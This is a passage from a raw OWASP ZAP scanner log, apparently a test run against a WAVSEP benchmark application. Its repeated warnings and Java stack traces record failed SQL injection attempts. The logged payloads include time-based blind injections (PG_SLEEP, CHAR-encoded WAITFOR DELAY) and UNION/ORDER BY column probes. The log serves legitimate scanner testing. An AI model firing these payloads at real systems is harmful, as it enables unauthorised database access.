org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682154 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682154 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6687=(SELECT 6687 FROM PG_SLEEP(5)) AND ('syxE'='syxE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6687=(SELECT 6687 FROM PG_SLEEP(5)) AND ('syxE'='syxE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682155 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 2547-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 2547-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682156 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8922=(SELECT 8922 FROM PG_SLEEP(5)) AND 'JnPX'='JnPX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8922=(SELECT 8922 FROM PG_SLEEP(5)) AND 'JnPX'='JnPX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682157 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682158 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 1624=(SELECT 1624 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 1624=(SELECT 1624 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682159 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682159 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3713=(SELECT 3713 FROM PG_SLEEP(5))-- iXzr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3713=(SELECT 3713 FROM PG_SLEEP(5))-- iXzr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682160 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682161 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (1739=1739] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (1739=1739 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682162 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682162 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682164 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 